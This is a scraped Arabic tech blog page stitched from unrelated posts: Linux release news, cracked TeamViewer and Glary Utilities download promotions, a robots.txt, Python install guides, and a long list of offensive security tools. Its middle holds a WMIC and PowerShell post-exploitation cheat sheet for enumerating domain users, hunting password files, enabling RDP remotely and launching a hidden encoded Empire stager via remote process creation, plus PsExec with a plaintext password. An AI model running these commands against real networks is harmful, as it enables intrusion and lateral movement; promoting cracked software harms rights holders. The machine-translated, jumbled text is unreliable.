إطلاق ArcoLinux 20.11.9

 أعلن Erik Dubois عن إطلاق ArcoLinux 20.11.9 وهو إصدار جديد مستقر من توزيع المشروع القائم على Arch مع Xfce كسطح المكتب الافتراضي كما هو الحال دائمًا يتوفر التوزيع في مجموعة واسعة من بيئات سطح المكتب الأخرى من خلال إصدارات ArcoLinuxB التي أنشأها المجتمع يقدم هذا الإصدار أيضًا متغيرًا جديدًا لـ dwm قد يكون dwm أحد أكثر أجهزة سطح المكتب إثارة للاهتمام لدينا في مجموعتنا يرمز dwm إلى مدير النوافذ الديناميكي ويأتي من suckless.org اسمح لي بنسخ لصق مقدمة موقع الويب الخاص بهم'dwm هو مدير نوافذ ديناميكي فهو يدير النوافذ في تخطيطات متجانبة وأحادية وعائمة يمكن تطبيق جميع التخطيطات ديناميكيًا مما يؤدي إلى تحسين بيئة التطبيق المستخدم والمهمة المنجزة منطقة رئيسية وتكدس تحتوي المنطقة الرئيسية على النافذة التي تحتاج حاليًا إلى أقصى قدر من الاهتمام بينما تحتوي منطقة التراص على جميع النوافذ الأخرى في التخطيط الأحادي يتم تكبير جميع النوافذ إلى حجم الشاشة انظر إعلان الإصدار الكامل لمزيد من التفاصيل ميجا بايت MD5 كالعادة ArcoLinuxD توزيع ضئيل مع البرامج النصية التي تمكن المستخدمين المحترفين من تثبيت أي سطح مكتب وتطبيق و ArcoLinuxB مجموعة من الإصدارات المجتمعية مع العديد من أجهزة سطح المكتب الشهيرة ومديري النوافذ متاحة أيضًا



DOWNLOADS

TeamViewer هو أفضل برنامج لإدارة جهاز كمبيوتر

 TeamViewer هو أفضل برنامج لإدارة جهاز كمبيوتر بعيد عبر الإنترنت اليوم أيضًا باستخدام هذا المنتج يمكنك إدارة الملفات على جهاز بعيد وإنشاء اتصالات فيديو ومؤتمرات عبر الويب يعد برنامج الوصول عن بُعد مناسبًا ليس فقط لجهاز كمبيوتر يعمل بنظام Windows 10 و 8.1 و 7 ولكن أيضًا للهواتف الذكية التي تعمل بنظام Android وحتى iOS حقيقة أن البرنامج يمكن التحكم فيه من مختلف الأجهزة والأنظمة المختلفة يجعله الأفضل بين المن افسين في الوقت الحالي أحدث إصدار من برنامج TeamViewer هو 15.8 والإصدار السابق هو 15.7.7 ربما لا يعلم الجميع ولكن الإصدار المجاني من برنامج TeamViewer 15 لنظام التشغيل Windows له حد زمني وستتطلب النسخة المدفوعة ترخيصًا لذلك أنشأنا هذه المقالة لإزالة القيود في برنامج TeamViewer 15 والعمل دون قيود زمنية بالإضافة إلى ذلك  سيكون من الممكن إعادة تعيين المعرف في برنامج TeamViewer 15 باختصار قمنا بتبسيط المهمة من أجلك مع العديد من المشكلات والآن يمكنك تنزيل برنامج TeamViewer 15 torrent منا مجانًا دون قيود وبدون حد زمني أي بعد تثبيت التطبيق يمكنك استخدام برنامج TeamViewer 15 المجاني للاستخدام الشخصي والتجاري وكذلك إعادة تعيين المعرف ا تحتاج إلى تفعيل برنامج TeamViewer 15-14 بمفتاح تفعيل  يمكنك استخدام النسخة الكاملة من البرنامج مجانًا تمامًا هنا يتوفر برنامج TeamViewer 15 repack Portable 2020 يمكنك تنزيل برنامج teamviewer 15 باللغة الروسية لجهاز الكمبيوتر الخاص بك في نهاية المقال ولكن إذا كنت مؤيدًا لكل شيء مرخص  فيمكنك تنزيل نسخة روسية مجانية من برنامج teamviewer 15 من الموقع الرسمي  أو شراء ترخيص. هذا كل شيء قم بالتنزيل والاستخدام كل صحة وجيدة


DOWNLOADS

Glary Utilities هي أداة ذات مجموعة كبيرة من الأدوات


التي تزيد بشكل كبير من أداء جهاز الكمبيوتر الخاص بك وتضمن ثباته باستخدام هذا البرنامج  مكنك تنظيف الملفات غير الضرورية الموجودة على القرص وفي السجل نفسه وكذلك البحث عن الملفات المكررةالإضافة إلى ذلك يضًا تحسين ذاكرة الوصول العشوائي للكمبيوتر الشخصي وإدارة بدء التشغيل وحذف البرامج تمامًا بدون ذيول نظرًا لوظائفها وسهولة استخدامها يمكن تصنيف الأداة كأحد أفضل البرامج من هذا النوع الإصدار المجاني من Glary Utilities 5.15 متاح على الموقع الرسمي يمكنك تنزيل الإصدار الكامل من Glary Utilities Pro على موقعنا باستخدام مفتاح التنشيط بعد التثبيت سيكون لديك أحدث إصدار روسي من Glary Utilities 5.15 ولن تضطر إلى البحث عن مفتاح ترخيص  حيث سيتم تضمينه أثناء التثبيت في رأيي  من الأفضل تنزيل مثل هذه البرامج حيث لا تحتاج إلى رمز تنشيط المنتج وعلى موقع  obzorovik.com يتم التنزيل على الفور أو من خلال سيل. أيضًا لا يمكنك فقط تنزيل Glary Utilities Pro مجانًا ولكن أيضًا البرامج المفيدة الأخرى المناسبة لنظام التشغيل Windows 10 دون أي مشاكل ،8.1 و Windows 7



DOWNLOAD

robots.txt

 # robots.txt works




# This file is to prevent the crawling and indexing of certain parts

# of your site by web crawlers and spiders run by sites like Yahoo!

# and Google. By telling these "robots" where not to go on your site,

# you save bandwidth and server resources.

#

# This file will be ignored unless it is at the root of your host:

# Used:    http://example.com/robots.txt

# Ignored: http://example.com/site/robots.txt

#

# For more information about the robots.txt standard, see:

# http://www.robotstxt.org/robotstxt.html


User-agent: Mediapartners-Google

Disallow:


User-agent: *

Disallow: /search

Disallow: /contact.html

Disallow: /error-page.html

Disallow: /about.html

Disallow: /search/label/?updated-min=

Disallow: /search/label/?updated-max=

Allow: /

User-agent: *

Disallow: /*.html

Allow: /*.html$

Allow: /plugins/*.css

Allow: /plugins/*.js

Allow: /plugins/*.png

Allow: /plugins/*.jpg

Allow: /plugins/*.gif

Allow: /core/*.css$

Allow: /core/*.css?

Allow: /core/*.js$

Allow: /core/*.js?

Allow: /core/*.gif

Allow: /core/*.jpg

Allow: /core/*.jpeg

Allow: /core/*.png

Allow: /core/*.svg

Allow: /profiles/*.css$

Allow: /profiles/*.css?

Allow: /profiles/*.js$

Allow: /profiles/*.js?

Allow: /profiles/*.gif

Allow: /profiles/*.jpg

Allow: /profiles/*.jpeg

Allow: /profiles/*.png

Allow: /profiles/*.svg

Sitemap: https://pythonscriptt.blogspot.com/sitemap.xml

Sitemap: https://pythonscriptt.blogspot.com/feeds/posts/default?orderby=UPDATED

Sitemap: https://pythonscriptt.blogspot.com/feeds/comments/default?redirect=false&start-index=1&max-results=500

Sitemap: https://pythonscriptt.blogspot.com/feeds/comments/default?redirect=false&start-index=501&max-results=500

Sitemap: https://pythonscriptt.blogspot.com/feeds/comments/default?redirect=false&start-index=1001&max-results=500

Sitemap: https://pythonscriptt.blogspot.com/feeds/posts/default?orderby=updated

Sitemap: https://pythonscriptt.blogspot.com/atom.xml?redirect=false&start-index=1&max-results=500


 Linux From




Linux From


Linux From Scratch (LFS) is a project that provides you with the steps necessary to build your own custom Linux system. The project has announced a new version of its instructional handbook, Linux From Scratch 10.0, along with additional steps to create a more feature-rich distribution called Beyond Linux From Scratch (BLFS). The release announcement reads: "The Linux From Scratch community announces the release of LFS Version 10.0. This version of the book has undergone a major reorganization. It uses enhanced cross-compilation techniques and an environment isolated from the host system to build tools for the final system. This reduces both the chance for changing the the host system and the potential of the host system influencing the LFS build process. Major package updates include toolchain versions glibc-2.32, gccc-10.2.0, and binutils-2.35. In total, 37 packages were updated since the last release. The Linux kernel has also been updated to version 5.8.3." The main LFS volume uses SysV init while there is an alternative version which uses systemd. The LFS handbook can be read on-line in HTML format


her👉 

الآلاف من أدوات اختبار الأمن الآلي

الآلاف من أدوات اختبار الأمن الآلي




أداة تعداد النطاق الفرعي الكلاسيكية 
https://github.com/lijiejie/subDomainsBrute

أداة تعداد نطاقات الدقة والسرعة والدقة التي توفرها
https://github.com/ring04h/wydomain 

أداة تعداد نطاقات فرعية بها سجلات خرائط
https://github.com/le4f/dnsmaper

أداة تعداد النطاق الفرعي عبر الإنترنت
https://github.com/0xbug/orangescan 

عنكبوت DNS لاستعلام meta ، يعدد سجلات DNS والمجالات الفرعية ، واجهة برمجة تطبيقات معتمدة
https://github.com/TheRook/subbrute 

سرد النطاقات الفرعية من خلال شفافية شهادات Google
https://github.com/We5ter/GSDF 

تعداد المجال الفرعي
https://github.com/mandatoryprogrammer/cloudflare_enum 

طرق مسح المجال الفرعي
https://github.com/guelfoweb/knock

أداة تعداد نطاقات فرعية في Intergratd Python
https://github.com/exp-db/PythonPool/tree/master/Tools/DomainSeeker 

ابحث عن أسماء نطاقات الأخ
https://github.com/code-scan/BroDomain

أداة برية سريعة للمجال
https://github.com/chuhades/dnsbrute 

أداة فرعي بسيطة وسريعة
https://github.com/yanxiu0614/subdomain3 

أداة فرعية فعالة وأداة بحث عن الحصول على اسم النطاق
https://github.com/yanxiu0614/subdomain3 

أداة تعداد النطاق الفرعي
https://github.com/evilsocket/dnssearch 

أداة تعداد نطاقات فرعية للعثور على الثغرات الأمنية
https://github.com/reconned/domained 

اسم المجال وأداة جمع عنوان البريد الإلكتروني
https://github.com/bit4woo/Teemo 

البريد الإلكتروني والمجال الفرعي وجامع الأسماء
https://github.com/laramies/theHarvester 

قم بتعداد تطبيقات النطاق الفرعي وفحصها باستخدام قواعد متعددة
https://github.com/swisskyrepo/Subdomino 

عنكبوت مصمم للعثور على نطاقات فرعية لمجال معين عن طريق الزحف
https://github.com/nmalcolm/Inventus

أداة تعداد نطاقات فرعية سريعة لاختبار الاختراق
https://github.com/aboul3la/Sublist3r 

التعداد الفرعي لأداة جمع المعلومات
https://github.com/jonluca/Anubis 

يسرد النطاقات الفرعية حول النطاق الرئيسي
https://github.com/n4xh4ck5/N4xD0rk 

اكتشاف نطاق فرعي من خلال التغييرات والتباديل
https://github.com/infosec-au/altdns 

أداة النطاق الفرعي للتعداد ، استنادًا إلى قاموس AsyncIO والقاموس غير المتكرر
https://github.com/FeeiCN/ESD 

سجل الشفافية في إساءة استخدام سجل الحصول على HTTPS لموقع فرعي
https://github.com/UnaPibaGeek/ctfr 

Dumain Bruteforcer-fast and مرنة domain name enforcer

https://github.com/giovanifss/Dumb 

تعداد النطاق الفرعي في Go
https://github.com/caffix/amass 

SubFinder عبارة عن أداة لاكتشاف نطاق فرعي ، وهي ذات بنية معيارية بسيطة وأصبحت إصدارًا لاحقًا من المشروع sublist3r
https://github.com/Ice3man543/subfinder 

قاعدة بيانات الضعف الماسح الضوئي أو أداة التعداد

ماسحة عدم حصانة SQLi عبر SQLMAP وتشارلز
https://github.com/0xbug/SQLiScanner 

الماسح الضوئي مشكلة عدم الحصانة SQLi مع 99 سطر من التعليمات البرمجية
https://github.com/stamparm/DSSS 

ماسحة عدم حصانة SQLi لـ MySQL
https://github.com/LoRexxar/Feigong 

SQLi الضعف الماسح الضوئي ل mongoDB
https://github.com/youngyangyang04/NoSQLAttack 

ماسح ضوئي لضعف SQLi الأعمى
https://github.com/Neohapsis/bbqsql 

ماسح الثغرات الأمنية SQLi مع برنامج Powershell
https://github.com/NetSPI/PowerUpSQL 

ماسح ضوئي لضعف SQL آخر
https://github.com/WhitewidowScanner/whitewidow 

أداة تدقيق واختبار MongoDB القوية
https://github.com/stampery/mongoaudit 

إطار بيثون لمسح واستغلال NoSQL
https://github.com/torque59/Nosql-Exploitation-Framework 

برنامج نصي بسيط لأتمتة الضعف في حقن SQL الأعمى
https://github.com/missDronio/blindy 

أداة اختبار التعرض السلبي النشطة والسلبية لـ SQL SQL
https://github.com/fengxuangit/Fox-scan 

مجموعة أدوات PowerShell لمهاجمة SQL Server
https://github.com/NetSPI/PowerUpSQL 

باستخدام حقن SQL الأعمى المستند إلى الوقت في رؤوس HTTP
https://github.com/JohnTroony/Blisqy 

تطبيق خفيف الوزن للعثور على معلومات قاعدة البيانات من خادم بعيد
https://github.com/ron190/jsql-injection 

ماسح الضعف الهائل في حقن SQL
https://github.com/Hadesy2k/sqliv 

صديق لـ SQLmap ، ستفعل ما تتوقعه من SQLmap
https://github.com/s0md3v/sqlmate 

أدوات قوية وما بعد التطوير لـ MySQL و MSSQL
https://github.com/m8r0wn/enumdb 

تحقق مما إذا كان موقع الويب يحتوي على ثغرة أمنية ضئيلة في حقن sql من wooyun.chamd5.org واستخدم sqlmap للمسح الضوئي تلقائيًا
https://github.com/9tail123/wooscan 




الشبكة الفرعية

قم بإزالة المسار من الشبكة الفرعية



بويرشيل هو بارز أكثر مرونة في إدارة اتصالات الشبكة من الأدوات المقدمة لسطر الأوامر ويندوز. على سبيل المثال، يمكنك بسهولة استرداد عنوان ماك من جميع محولات الشبكة على الجهاز الحالي الخاص بك مع البرنامج النصي التالي

$strComputer = "."


$colItems = get-wmiobject -class "Win32_NetworkAdapterConfiguration" `

-computername $strComputer | Where{$_.IpEnabled -Match "True"}

foreach ($objItem in $colItems) {

write-host "Hardware Address:" $objItem.MACAddress

}

السيطرة على أكتيف ديركتوري في بويرشيل
بويرشيل يمكن أن تتفاعل مباشرة مع
أكتيف ديركتوري، والقراءة في قاعدة البيانات الخاصة به، واستخراج المعلومات وعرضها لك. على سبيل المثال، مع كمدليت التالية، يمكنك عرض كافة المستخدمين في "أكتيف ديركتوري":



$Dom = 'LDAP://DC=scribnertechmediacorp;DC=local'

$Root = New-Object DirectoryServices.DirectoryEntry $Dom

$i=0

# Create a selector and start searching from the Root of AD

$selector = New-Object DirectoryServices.DirectorySearcher

$selector.SearchRoot = $root

$selector.set_pagesize(1000)

$adobj= $selector.findall() |`

where {$_.properties.objectcategory -match "CN=Person"}

foreach ($person in $adobj){

$prop=$person.properties

$i++

Write-host "First name: $($prop.givenname) " `

"Last Name: $($prop.sn) Display Name: $($prop.cn)"

}

"Total AD Users Found: $i"


في هذا المثال، شبكة مولتيتير-فنيت الظاهرية لديها ثلاث شبكات فرعية: الشبكات الفرعية الأمامية و المتوسطة و الخلفية التي تحتوي على أربع اتصالات عبر وحدة: ديفولتسيتهق وثلاثة فروع .

تحدد هذه الخطوات "ديفولتسيتهق" إلى اتصال الويب الافتراضي الذي يجبر معالجة القناة وتعيين الشبكات الفرعية "الوسطى" و "الخلفية" لاستخدام إجبار معالجة القناة.
إنشاء جدول توجيه. استخدم كمدليتس التالية لإنشاء جدول التوجيه.



New-AzureRouteTable –Name "MyRouteTable" –Label "Routing Table for Forced Tunneling" –Location "North Europe"

إضافة مسار مسبق إلى جدول التوجيه.

يضيف المثال التالي مسار مسبق الضبط إلى جدول التوجيه المحدد في الخطوة 1. لاحظ أن المسار الوحيد المدعم هو ديباجة وجهة "0.0.0.0/0" من "فنغاتيواي" نيكستوب.

Get-AzureRouteTable -Name "MyRouteTable" | Set-AzureRoute –RouteTable "MyRouteTable" –RouteName "DefaultRoute" –AddressPrefix "0.0.0.0/0" –NextHopType VPNGateway

ربط جداول التوجيه للشبكات الفرعية.

بعد إنشاء جدول التوجيه والانضمام إلى المسار، استخدم المثال التالي للانضمام أو ربط جدول التوجيه إلى الشبكة الفرعية فنيت. يضيف هذا المثال جدول التوجيه "ميروتيتابل" إلى الشبكات الفرعية المتوسطة والخلفية في فنيت متعدد المستويات فنيت.

Set-AzureSubnetRouteTable -VirtualNetworkName "MultiTier-VNet" -SubnetName "Midtier" -RouteTableName "MyRouteTable"
Set-AzureSubnetRouteTable -VirtualNetworkName "MultiTier-VNet" -SubnetName "Backend" -RouteTableName "MyRouteTable"

تعيين محطات محددة مسبقا للقنوات الإلزامية.

في الخطوات السابقة، إنشاء البرنامج النصي كمدليت جدول التوجيه وربط جدول التوجيه إلى كل من شبكات فرعية فنيت. والخطوات المتبقية هي اختيار موقع الويب المحلي بين اتصالات الشبكة المتعددة المواقع الافتراضية كموقع ويب افتراضي أو قناة

$DefaultSite = @("DefaultSiteHQ")
Set-AzureVNetGatewayDefaultSite –VNetName "MultiTier-VNet" –DefaultSite "DefaultSiteHQ"

احذف جدول التوجيه
Remove-AzureRouteTable -Name <routeTableName>

أدرج جدول التوجيه

Get-AzureRouteTable [-Name <routeTableName> [-DetailLevel <detailLevel>]]


أزل المسارات من جدول التوجيه
Remove-AzureRouteTable –Name <routeTableName>



قم بإزالة المسار من الشبكة الفرعية

Remove-AzureSubnetRouteTable –VirtualNetworkName <virtualNetworkName> -SubnetName <subnetName>


يسرد جداول التوجيه المرتبطة بالشبكات الفرعية

Get-AzureSubnetRouteTable -VirtualNetworkName <virtualNetworkName> -SubnetName <subnetName>



قم بإزالة موقع ويب الافتراضي من بوابة فنيت في

Remove-AzureVnetGatewayDefaultSite -VNetName <virtualNetworkName>





يمكنك تحميل لدينا النصي تصحيحها على جيثب جيتست.

يتم التقاط الصورة من القمر الصناعي الطقس الياباني هيماواري 8، والتي يتم تحديثها مرة واحدة في 10 دقيقة. البرنامج النصي بتحميله في أجزاء لأنه على الخادم ينقسم لقطة إلى مصفوفة من 4 بنسبة 4. ثم يندمج في واحد ويحددها كخلفية سطح المكتب.

لتشغيل البرنامج النصي، انقر بزر الماوس الأيمن فوق الملف، ثم تشغيل مع بويرشيل. إذا كنت ترغب في تحديث الصورة بشكل دائم، وضع البرنامج النصي في جدولة المهام ويندوز، تعيين التنفيذ مرة واحدة كل 10 دقيقة.

المشاكل والحلول الممكنة
إذا كنت تجلس خلف وكيل الشركة، ثم بعد السطر


$request = [System.Net.WebRequest]::create($thisurl)

$request.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials

الأسماء المستعارة

هناك العديد من فئات ومي التي يمكن أن توفر طن من المعلومات وتساعد إلى حد كبير اختبار في أن تصبح أكثر دراية البيئة المستهدفة. في ما يلي قائمة ببعض الاستعلامات المفيدة.


Host Enumeration:

--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)

wmic computersystem LIST full

--- Anti-Virus ---

wmic /namespace:\\root\securitycenter2 path antivirusproduct

--- Peripherals ---
wmic path Win32_PnPdevice 

--- Installed Updates ---
wmic gfe list brief

--- Directory Listing and File Search ---

wmic DATAFILE where "path='\\Users\\test\\Documents\\'" GET Name,readable,size

wmic DATAFILE where "drive='C:' AND Name like '%password%'" GET Name,readable,size /VALUE

--- Local User Accounts ---

wmic USERACCOUNT Get Domain,Name,Sid

Domain Enumeration:

--- Domain and DC Info ---

wmic NTDOMAIN GET DomainControllerAddress,DomainName,Roles /VALUE

--- Domain User Info ---

wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='testAccount'" GET 

--- List All Users ---

wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname

--- List All Groups ---

wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname

--- Members of A Group ---

wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value

--- List All Computers ---

wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname

OR

wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname

Misc:

--- Execute Remote Command ---

wmic process call create "cmd.exe /c calc.exe"

--- Enable Remote Desktop ---

wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"

OR

wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

في ما يلي قائمة بالأسماء المستعارة المفيدة لتعداد معلومات عن النظام والعملية والنطاق والمستخدمين والمجموعات:

wmic computerystem list full /format:list  
wmic process list /format:list  
wmic ntdomain list /format:list  
wmic useraccount list /format:list  
wmic group list /format:list  
wmic sysaccount list /format:list 

جميع الأسماء المذكورة أعلاه يمكن استخدامها عن بعد. يمكنك أيضا التفاعل مع الطبقات مباشرة مع الخيار 'المسار'. على سبيل المثال، إليك طريقة خفية جدا لاكتشاف المشرفين المحليين على جهاز بعيد (لاحظ أن هذا النطاق هو اسم الكمبيوتر)

wmic /node:ordws01 path win32_groupuser where (groupcomponent="win32_group.name=\"administrators\",domain=\"ORDWS01\"")  

ملاحظة: ركضت وميك من موجه الأوامر كما جاريتا، وبالتالي لم أكن بحاجة إلى تحديد / المستخدم
ومن المفيد أنيلينر آخر هو معرفة من الذي تم تسجيل الدخول إلى جهاز (عندما كنت تصيد المشرفين):


wmic /node:ordws01 path win32_loggedonuser get antecedent 

وميك حتى قراءة العقد من ملف نصي وتنفيذ الأمر على كل منهم. إذا كان لديك ملف نصي لمحطات العمل:
wmic /node:@workstations.txt path win32_loggedonuser get antecedent 

لأمر بإرجاع بروسيسيد و ريتورنفالو (0 يعني أي أخطاء)
من خلال تحديد / عقدة فإنه من السهل للغاية لإنشاء العمليات عن بعد وتنفيذ الأوامر. في آخر مشاركة أثبتت إطلاق ميتربريتر من أمر إنشاء سك مع وحدة web_delivery ميتاسبلويت ل. للتبديل عنه، دعونا إطلاق عامل إمبراطورية بويرشيل هذه المرة. أولا، إنشاء سلسلة الأوامر لتنفيذ باستخدام "قاذفة" ستاجر في الإمبراطورية:

powershell.exe -NoP -sta -NonI -W Hidden -Enc JABXAEMAPQBOAEUAVwAtAE8AQgBKAGUAQw...truncated...  

والآن من ويندوز، سنقوم عن بعد بإنشاء عملية على ومي لتنفيذ هذه السلسلة:


wmic /node:ordws01 /user:CSCOU\jarrieta path win32_process call create "**empire launcher string here**" 

إذا كان أحد هذه المنافذ مفتوحا، يتم تكوين وينرم ويمكنك محاولة إدخال جلسة عمل عن بعد.
بدء جلسة وينرم.
لدينا أولا لتكوين آلة هجوم لدينا للعمل مع وينرم كذلك. نحن بحاجة إلى تمكينه وإضافة أي "الضحايا" كمضيفين موثوق بهم. من موجه بويرشيل مرتفع، قم بتشغيل الأمرين التاليين
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts * 

يؤدي ذلك إلى إضافة حرف بدل إلى إعداد تروستيدوستس. كن حذرا مما يستتبعه. ملاحظة: كان لي أيضا لتغيير نوع الشبكة على جهاز الهجوم من "العامة" إلى "العمل" الشبكة. YMMV
بمجرد تكوين آلة الهجوم، استخدم الدالة تيست-وسمان لاختبار ما إذا تم تكوين الهدف ل وينرم. يجب أن ترى بعض المعلومات التي تم إرجاعها حول إصدار البروتوكول و وسميد:
الآن يمكننا استخدام بويرشيل استدعاء الأوامر لتنفيذ أمر عن بعد على الهدف عبر وينرم. لتشغيل إيبكونفيغ عن بعد ومعرفة الإخراج


Invoke-Command -Computer ordws01 -ScriptBlock {ipconfig /all} -credential CSCOU\jarrieta 

أو، إذا كنت تريد إسقاط الحق في جلسة بويرشيل تفاعلية، استخدم 
Enter-PSSession 

جبار وينرم مفتوح. إذا كنت تريد حقا استخدام بس ريموتينغ و وينرم ولكن لم يتم تكوين الهدف لذلك، هل يمكن "فرض" على من خلال أمر واحد. أنا لا أنصح هذا ولكن إذا كنت تريد حقا لاستخدام وينرم أو بسريموتينغ من كل الوسائل تفعل ذلك بهذه الطريقة. على سبيل المثال، باستخدام بسيكسيك
\tools\SysinternalsSuite> .\PsExec.exe \\ordws04 -u cscou\jarrieta -p nastyCutt3r -h -d powershell.exe "enable-psre  
moting -force" 

يمكنك استبدال متغير ستربكومب $ مع أي اسم المضيف الذي يمكن الوصول إليه من قبل الجهاز بتشغيل بويرشيل، مما يجعل من السهل للحصول على قائمة من عناوين ماك من جميع أنحاء الشبكة.

يمكنك أيضا معرفة عناوين إب النشطة على شبكتك، وذلك باستخدام كمدليت بينغ بسيط يدور عبر جميع عناوين إب الممكنة على الشبكة الفرعية المحلية. سيؤدي هذا إلى عرض جدول مع عناوين إب ورموز الحالة، 0 يشير إلى أن العنوان قيد الاستخدام.



1..254| ForEach -Process {WmiObject -Class Win32_PingStatus -Filter ("Address='192.168.16." + $_ + "'") -ComputerName .} | Select-Object -Property Address, StatusCode | ft

Temp Mail انشاء بريد الكتروني وهمي

انشاء بريد الكتروني وهمي android



تخلص الآن من الرسائل المتطفلة ورسائل الاعلانات و الاختراقات والهجوم الآلي. أبقى صندوق البريد الخاص بك نظيفا وآمنا
Temp Mail يزودك بعنوان بريد الكتروني آمن ومؤقت ومجاني ومجهول ويمكنك التخلص منه في أي وقت


install kali linux for android

install kali linux for android

Termux is a free and open source application 
that simulates the command interface used in 
an operating system Linux. By doing this, you 
can enter all the usual commands and work 
comfortably through your Android device



pkg install git

pkg install python

git clone https://github.com/AnonoHackerr/toolss.git

chmod +x toolss.py

استعادة الصور والفيديوهات والملفات android

استعادة الصور والفيديوهات والملفات android




هل قمت بمسح صور او فيديو من هاتفتك بالخطأ او عما فورمات للهاتف ؟ وتريد استعادة الصور المحذوفة
 و استرجاع الملفات المحذوفة من ذاكرة الهاتف؟. هل مللت من البحث عن برنامج استعادة الصور المحذوفة
هل تبحث عن برنامج استرجاع الصور المحذوفة ؟ ولكن لم تجد الي التطبيقات الكاذبة والدي لا تشتغل ابد


تحميل PyCharm

تحميل PyCharm/python





PyCharm هو محرر عبر النظام الأساسي تم تطويره بواسطة 

JetBrains. يوفر Pycharm جميع الأدوات التي تحتاجها لتطوير بيثون الإنتاجية.


فيما يلي الخطوات التفصيلية لتثبيت Python و PyCharm
الاول⇓

التاني⇓

تحميل OpenCV-Python in Windows

تحميل OpenCV-Python in Windows



تم إطلاق OpenCV في شركة Intel في عام 1999 بواسطة Gary Bradsky ، وتم إصدار الإصدار الأول في عام 2000
وانضم Vadim Pisarevsky إلى Gary Bradsky لإدارة فريق OpenCV التابع لبرنامج Intel 
الروسي. في عام 2005 ، تم استخدام OpenCV في Stanley ، السيارة التي فازت بجائزة تحدي DARPA Grand 2005
في وقت لاحق ، استمر تطويره النشط بدعم من Willow Garage مع جاري برادسكي وفاديم بيساريفسكي الذي يقود المشروع. يدعم OpenCV 
الآن العديد من الخوارزميات المتعلقة برؤية الكمبيوتر والتعلم الآلي ويتوسع يومًا بعد يوم
يدعم OpenCV مجموعة كبيرة ومتنوعة من لغات البرمجة مثل C ++ و Python و Java 
وما إلى ذلك ، وهو متاح على منصات مختلفة مثل Windows و Linux و OS X و Android و 
iOS. واجهات لعمليات GPU عالية السرعة القائمة على CUDA و OpenCL هي أيضا قيد التطوير النشط.
OpenCV-Python هو واجهة برمجة تطبيقات Python لـ OpenCV ، حيث تجمع بين أفضل صفات واجهة برمجة تطبيقات OpenCV C ++ ولغة Python


موقع الاول⇓

موقع التاني⇓


موقع التالث⇓

كيفيت تتبيت Python3.6.9 على kali linux

كيفيت تتبيت Python3.6.9 على kali linux/Debian





kali linux

    sudo apt-get install build-essential checkinstall

 sudo apt-get install libreadline-gplv2-dev libncursesw5-dev libssl-dev libsqlite3-dev tk-dev libgdbm-dev libc6-dev libbz2-dev

 cd /usr/src

 sudo wget https://www.python.org/ftp/python/3.6.9/Python-3.6.9.tgz

 sudo tar xzf Python-3.6.9.tgz

 cd Python-3.6.9

 sudo ./configure --enable-optimizations

 sudo make altinstall

 python3.6 -V

Python 3.6.9

 pip3.6 -V

pip 9.0.1 from /usr/local/lib/python3.6/site-packages (python 3.6)


Debian

 sudo nano /etc/apt/sources.list
# add
deb http://ftp.de.debian.org/debian testing main
 echo 'APT::Default-Release "stable";' | sudo tee -a /etc/apt/apt.conf.d/00local
 sudo apt-get update
 sudo apt-get -t testing install python3.6
 python3.6 -V



Debian

wget https://www.python.org/ftp/python/3.6.9/Python-3.6.9.tgz
tar xvf Python-3.6.9.tgz
cd Python-3.6.9
./configure --enable-optimizations --enable-shared
make -j8
sudo make altinstall
python3.6

مبرمج python

مبرمج python




في أواخر الثمانينيات ، شارك المبرمج جويدو فان روسوم في تطوير لغة البرمجة ABC في مركز 
Centrum voor Wiskunde في Informatica (CWI)
في أمستردام ، هولندا. كان يعمل في فريق نظام التشغيل Amoeba الذي كان من 
الصعب الاتصال به مع نظام Bourne shell المستخدم كواجهة مستخدم. إنه يعتقد 
أن لغة البرمجة النصية المستوحاة من ABC يمكن أن تكون مثيرة للاهتمام كمترجم لـ Amoeba11.
في عام 1989 ، كان يستمتع بأسبوع عطلة خلال عيد الميلاد ، ويستخدم جهاز الكمبيوتر الشخصي الخاص به 12
لكتابة الإصدار الأول من اللغة. من محبي المسلسل التلفزيوني Monty Python's Flying 
Circus ، قرر إنشاء هذا المشروع Python13. كانت مستوحاة بشكل أساسي من 
ABC ، ​​على سبيل المثال ، المسافة البادئة كنوع من بناء الجملة أو أنواع عالية المستوى ولكن أيضًا 
Modula-3 للمعالجة الاستثنائية ولغة C وأدوات UNIX 14.
في السنة التالية ، بدأ اعتماد مشروع اللغة من قبل فريق مشروع Amoeba ، مع استمرار 
Guido تطوره بشكل رئيسي خلال وقت فراغه. في فبراير 1991 ، تم نشر
النسخة العامة الأولى ، المرقمة 0.9.015 ، على منتدى Usenet 
alt.sources. الإصدار الأخير الذي صدر في CWI كان Python 1.2


تحميل python 2.7 على وندوز

تم إصدار Python 2.7.0 في 3 يوليو ، 2010


من المقرر أن يكون Python 2.7 هو الإصدار الرئيسي الأخير في سلسلة 2.x 
قبل أن ينتقل إلى فترة صيانة ممتدة. يحتوي هذا الإصدار على العديد من الميزات التي تم إصدارها 
لأول مرة في Python 3.1. التحسينات في هذا الإصدار تشمل


تحميل python 2.7 على وندوز⇩

تحميل python 2.7 على kali linux⇓ 



kali linux


sudo apt-get install build-essential libsqlite3-dev zlib1g-dev libncurses5-dev libgdbm-dev libbz2-dev libreadline5-dev libssl-dev libdb-dev

wget http://www.python.org/ftp/python/2.7.3/Python-2.7.3.tgz
tar -xzf Python-2.7.3.tgz
cd Python-2.7.3

./configure --prefix=/usr --enable-shared
make
sudo make install
cd ..

sudo update-alternatives --install /usr/bin/python python /usr/bin/python2.6 20
sudo update-alternatives --install /usr/bin/python python /usr/bin/python2.7 10
sudo update-alternatives --set python /usr/bin/python2.6

wget http://peak.telecommunity.com/dist/ez_setup.py
sudo python2.7 ez_setup.py
sudo easy_install-2.7 virtualenv

format usbi

format usbi



diskpart

list disk

select disk 1

clean

create partition primary

format fs=fat32
assign